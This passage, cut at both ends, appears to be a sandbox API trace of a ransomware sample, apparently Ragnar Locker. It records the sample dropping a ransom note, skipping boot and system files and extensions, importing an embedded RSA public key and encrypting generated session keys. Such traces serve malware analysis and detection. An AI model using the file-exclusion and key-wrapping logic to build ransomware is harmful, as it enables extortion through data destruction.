lpString1="\\\\?\\C:\\588bce7c90097ed212\\1033\\", lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1033\\!$R4GN4R_B8CF767A$!.txt") returned="\\\\?\\C:\\588bce7c90097ed212\\1033\\!$R4GN4R_B8CF767A$!.txt" [0172.278] CopyFileW (lpExistingFileName="C:\\Users\\Public\\Documents\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\users\\public\\documents\\!$r4gn4r_b8cf767a$!.txt"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\588bce7c90097ed212\\1033\\!$r4gn4r_b8cf767a$!.txt"), bFailIfExists=1) returned 1 [0172.283] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1033\\", lpString2="*.*" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1033\\*.*") returned="\\\\?\\C:\\588bce7c90097ed212\\1033\\*.*" [0172.283] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\*.*", nBufferLength=0x104, lpBuffer=0x5cfd864, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1033\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0172.283] lstrcpyW (in: lpString1=0x5cfd65c, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0172.283] lstrcpyW (in: lpString1=0x5cfd8a2, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0172.283] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5cfde80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5cfde80) returned 0x3547d40 [0172.283] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0172.283] FindNextFileW (in: hFindFile=0x3547d40, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37db23a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf407b388, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0172.285] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0172.285] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0172.285] FindNextFileW (in: hFindFile=0x3547d40, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4077903, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xf4077903, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0172.285] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2=".") returned -1 [0172.285] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="..") returned -1 [0172.285] FindNextFileW (in: hFindFile=0x3547d40, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd723cc00, ftCreationTime.dwHighDateTime=0x1cabb47, ftLastAccessTime.dwLowDateTime=0xd723cc00, ftLastAccessTime.dwHighDateTime=0x1cabb47, ftLastWriteTime.dwLowDateTime=0xd723cc00, ftLastWriteTime.dwHighDateTime=0x1cabb47, nFileSizeHigh=0x0, nFileSizeLow=0xc74, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0172.285] lstrcmpiW (lpString1="eula.rtf", lpString2=".") returned 1 [0172.285] lstrcmpiW (lpString1="eula.rtf", lpString2="..") returned 1 [0172.285] FindNextFileW (in: hFindFile=0x3547d40, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47ad1a00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x47ad1a00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x47ad1a00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12db0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="")) returned 1 [0172.285] lstrcmpiW (lpString1="LocalizedData.xml", lpString2=".") returned 1 [0172.286] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="..") returned 1 [0172.286] FindNextFileW (in: hFindFile=0x3547d40, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 1 [0172.286] lstrcmpiW (lpString1="SetupResources.dll", lpString2=".") returned 1 [0172.286] lstrcmpiW (lpString1="SetupResources.dll", lpString2="..") returned 1 [0172.286] FindNextFileW (in: hFindFile=0x3547d40, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 0 [0172.286] FindClose (in: hFindFile=0x3547d40 | out: hFindFile=0x3547d40) returned 1 [0172.287] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5cfde80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5cfde80) returned 0x3548140 [0172.287] FindNextFileW (in: hFindFile=0x3548140, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf407b388, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xf407b388, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0172.290] FindNextFileW (in: hFindFile=0x3548140, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4077903, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xf4077903, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0172.290] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1033\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0172.290] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="!$R4GN4R_B8CF767A$!.txt") returned="!$R4GN4R_B8CF767A$!.txt" [0172.290] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1033\\!$R4GN4R_B8CF767A$!.txt") returned=".txt" [0172.290] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 0 [0172.290] FindNextFileW (in: hFindFile=0x3548140, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd723cc00, ftCreationTime.dwHighDateTime=0x1cabb47, ftLastAccessTime.dwLowDateTime=0xd723cc00, ftLastAccessTime.dwHighDateTime=0x1cabb47, ftLastWriteTime.dwLowDateTime=0xd723cc00, ftLastWriteTime.dwHighDateTime=0x1cabb47, nFileSizeHigh=0x0, nFileSizeLow=0xc74, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0172.290] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1033\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0172.290] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="eula.rtf" | out: lpString1="eula.rtf") returned="eula.rtf" [0172.290] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1033\\eula.rtf") returned=".rtf" [0172.290] lstrcmpiW (lpString1="eula.rtf", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0172.290] lstrcmpiW (lpString1="eula.rtf", lpString2="autorun.inf") returned 1 [0172.290] lstrcmpiW (lpString1="eula.rtf", lpString2="boot.ini") returned 1 [0172.290] lstrcmpiW (lpString1="eula.rtf", lpString2="bootfont.bin") returned 1 [0172.290] lstrcmpiW (lpString1="eula.rtf", lpString2="bootsect.bak") returned 1 [0172.290] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgr") returned 1 [0172.290] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgr.efi") returned 1 [0172.291] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgfw.efi") returned 1 [0172.291] lstrcmpiW (lpString1="eula.rtf", lpString2="desktop.ini") returned 1 [0172.291] lstrcmpiW (lpString1="eula.rtf", lpString2="iconcache.db") returned -1 [0172.291] lstrcmpiW (lpString1="eula.rtf", lpString2="ntldr") returned -1 [0172.291] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.dat") returned -1 [0172.291] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.dat.log") returned -1 [0172.291] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.ini") returned -1 [0172.291] lstrcmpiW (lpString1="eula.rtf", lpString2="thumbs.db") returned -1 [0172.291] lstrcmpiW (lpString1=".rtf", lpString2=".db") returned 1 [0172.291] lstrcmpiW (lpString1=".rtf", lpString2=".sys") returned -1 [0172.291] lstrcmpiW (lpString1=".rtf", lpString2=".dll") returned 1 [0172.291] lstrcmpiW (lpString1=".rtf", lpString2=".lnk") returned 1 [0172.291] lstrcmpiW (lpString1=".rtf", lpString2=".msi") returned 1 [0172.291] lstrcmpiW (lpString1=".rtf", lpString2=".drv") returned 1 [0172.291] lstrcmpiW (lpString1=".rtf", lpString2=".exe") returned 1 [0172.291] GetProcessHeap () returned 0x3520000 [0172.291] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xd16c) returned 0x3606430 [0172.293] lstrcpyW (in: lpString1=0x3606830, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1033\\eula.rtf" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1033\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1033\\eula.rtf" [0172.293] FindNextFileW (in: hFindFile=0x3548140, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47ad1a00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x47ad1a00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x47ad1a00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12db0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="")) returned 1 [0172.293] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1033\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0172.294] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="LocalizedData.xml" | out: lpString1="LocalizedData.xml") returned="LocalizedData.xml" [0172.294] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1033\\LocalizedData.xml") returned=".xml" [0172.294] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0172.294] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="autorun.inf") returned 1 [0172.294] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="boot.ini") returned 1 [0172.294] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootfont.bin") returned 1 [0172.294] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootsect.bak") returned 1 [0172.294] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgr") returned 1 [0172.294] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgr.efi") returned 1 [0172.294] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="bootmgfw.efi") returned 1 [0172.294] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="desktop.ini") returned 1 [0172.295] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="iconcache.db") returned 1 [0172.295] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntldr") returned -1 [0172.295] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.dat") returned -1 [0172.295] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.dat.log") returned -1 [0172.295] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="ntuser.ini") returned -1 [0172.295] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="thumbs.db") returned -1 [0172.295] lstrcmpiW (lpString1=".xml", lpString2=".db") returned 1 [0172.295] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0172.295] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0172.295] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0172.295] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0172.295] lstrcmpiW (lpString1=".xml", lpString2=".drv") returned 1 [0172.295] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0172.295] GetProcessHeap () returned 0x3520000 [0172.296] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xd16c) returned 0x5d10050 [0172.297] lstrcpyW (in: lpString1=0x5d10450, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1033\\LocalizedData.xml" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1033\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1033\\LocalizedData.xml" [0172.297] FindNextFileW (in: hFindFile=0x3548140, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 1 [0172.297] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1033\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1033\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0172.297] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="SetupResources.dll" | out: lpString1="SetupResources.dll") returned="SetupResources.dll" [0172.297] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1033\\SetupResources.dll") returned=".dll" [0172.297] lstrcmpiW (lpString1="SetupResources.dll", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0172.297] lstrcmpiW (lpString1="SetupResources.dll", lpString2="autorun.inf") returned 1 [0172.297] lstrcmpiW (lpString1="SetupResources.dll", lpString2="boot.ini") returned 1 [0172.297] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootfont.bin") returned 1 [0172.297] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootsect.bak") returned 1 [0172.297] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgr") returned 1 [0172.297] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgr.efi") returned 1 [0172.297] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgfw.efi") returned 1 [0172.298] lstrcmpiW (lpString1="SetupResources.dll", lpString2="desktop.ini") returned 1 [0172.298] lstrcmpiW (lpString1="SetupResources.dll", lpString2="iconcache.db") returned 1 [0172.298] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntldr") returned 1 [0172.298] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.dat") returned 1 [0172.298] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.dat.log") returned 1 [0172.298] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.ini") returned 1 [0172.298] lstrcmpiW (lpString1="SetupResources.dll", lpString2="thumbs.db") returned -1 [0172.298] lstrcmpiW (lpString1=".dll", lpString2=".db") returned 1 [0172.298] lstrcmpiW (lpString1=".dll", lpString2=".sys") returned -1 [0172.298] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0172.298] FindNextFileW (in: hFindFile=0x3548140, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 0 [0172.298] GetProcessHeap () returned 0x3520000 [0172.298] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x8) returned 0x3586920 [0172.298] CryptAcquireContextW (in: phProv=0x3586920, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3586920*=0x3557188) returned 1 [0172.299] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xecd090, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 452 [0172.299] GetProcessHeap () returned 0x3520000 [0172.299] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x388) returned 0x35cd718 [0172.299] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xecd090, cbMultiByte=-1, lpWideCharStr=0x35cd718, cchWideChar=452 | out: lpWideCharStr="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n") returned 452 [0172.299] CryptStringToBinaryW (in: pszString="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n", cchString=0x0, dwFlags=0x0, pbBinary=0x0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0172.299] GetProcessHeap () returned 0x3520000 [0172.299] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x126) returned 0x35948f0 [0172.299] CryptStringToBinaryW (in: pszString="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n", cchString=0x0, dwFlags=0x0, pbBinary=0x35948f0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x35948f0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0172.299] GetProcessHeap () returned 0x3520000 [0172.299] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x35cd718 | out: hHeap=0x3520000) returned 1 [0172.299] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x35948f0, cbEncoded=0x126, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x5cfd63c, pcbStructInfo=0x5cfd634 | out: pvStructInfo=0x5cfd63c, pcbStructInfo=0x5cfd634) returned 1 [0172.299] CryptImportPublicKeyInfo (in: hCryptProv=0x3557188, dwCertEncodingType=0x1, pInfo=0x357fc90*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x357fcc0*, PublicKey.cbData=0x10e, PublicKey.pbData=0x357fcc8*, PublicKey.cUnusedBits=0x0), phKey=0x3586924 | out: phKey=0x3586924*=0x3547d00) returned 1 [0172.299] GetProcessHeap () returned 0x3520000 [0172.299] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x35948f0 | out: hHeap=0x3520000) returned 1 [0172.299] LocalFree (hMem=0x357fc90) returned 0x0 [0172.299] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd63c*=0x3556880) returned 1 [0172.300] CryptGenRandom (in: hProv=0x3556880, dwLen=0x28, pbBuffer=0x3613354 | out: pbBuffer=0x3613354) returned 1 [0172.300] CryptReleaseContext (hProv=0x3556880, dwFlags=0x0) returned 1 [0172.300] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd63c*=0x0) returned 0 [0172.303] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd638*=0x3556880) returned 1 [0172.303] CryptGenRandom (in: hProv=0x3556880, dwLen=0x40, pbBuffer=0x5cfd5f8 | out: pbBuffer=0x5cfd5f8) returned 1 [0172.303] CryptReleaseContext (hProv=0x3556880, dwFlags=0x0) returned 1 [0172.303] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd638*=0x0) returned 0 [0172.306] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd634*=0x3556990) returned 1 [0172.307] CryptGenRandom (in: hProv=0x3556990, dwLen=0x20, pbBuffer=0x361337c | out: pbBuffer=0x361337c) returned 1 [0172.307] CryptReleaseContext (hProv=0x3556990, dwFlags=0x0) returned 1 [0172.307] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd634*=0x0) returned 0 [0172.312] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd630*=0x3556b28) returned 1 [0172.312] CryptGenRandom (in: hProv=0x3556b28, dwLen=0x40, pbBuffer=0x5cfd5f0 | out: pbBuffer=0x5cfd5f0) returned 1 [0172.312] CryptReleaseContext (hProv=0x3556b28, dwFlags=0x0) returned 1 [0172.312] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd630*=0x0) returned 0 [0172.315] CryptEncrypt (in: hKey=0x3547d00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x361339c*, pdwDataLen=0x5cfe340*=0x28, dwBufLen=0x190 | out: pbData=0x361339c*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0172.316] GetLastError () returned 0x80090016 [0172.316] CryptEncrypt (in: hKey=0x3547d00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x361349c*, pdwDataLen=0x5cfe340*=0x20, dwBufLen=0x140 | out: pbData=0x361349c*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0172.316] GetLastError () returned 0x80090016 [0172.316] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec1af0, lpParameter=0x3606430, dwCreationFlags=0x0, lpThreadId=0x5cfdd80 | out: lpThreadId=0x5cfdd80*=0xf24) returned 0x3f0 [0172.317] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd63c*=0x3556660) returned 1 [0172.318] CryptGenRandom (in: hProv=0x3556660, dwLen=0x28, pbBuffer=0x5d1cf74 | out: pbBuffer=0x5d1cf74) returned 1 [0172.318] CryptReleaseContext (hProv=0x3556660, dwFlags=0x0) returned 1 [0172.318] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd63c*=0x0) returned 0 [0172.321] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd638*=0x35562a8) returned 1 [0172.322] CryptGenRandom (in: hProv=0x35562a8, dwLen=0x40, pbBuffer=0x5cfd5f8 | out: pbBuffer=0x5cfd5f8) returned 1 [0172.322] CryptReleaseContext (hProv=0x35562a8, dwFlags=0x0) returned 1 [0172.322] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd638*=0x0) returned 0 [0172.324] 